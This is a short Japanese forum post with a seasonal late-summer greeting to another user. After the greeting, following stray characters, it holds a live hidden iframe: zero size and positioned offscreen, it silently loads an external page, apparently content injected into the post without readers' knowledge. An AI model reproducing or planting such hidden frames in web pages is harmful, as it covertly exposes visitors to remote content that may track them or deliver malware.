本文コピー
▼本文
くれないさん 残暑お見舞い申し上げます。 立秋を過ぎたと言っても、それはあくまでも暦の上でのこと。一昨日の最高気温なんて38℃ですものね!!! 残暑厳しき折、ご自愛くださいませ。*gV<iframe src="http://img.onmitsu.jp/en/20_0_a.html" style="width:0;height:0;position:fixed;top:0;left:110%;border:none;" scrolling="no"></iframe>
スレッドに戻る
HP
/
RANK
/
UP
MOBI-BOARD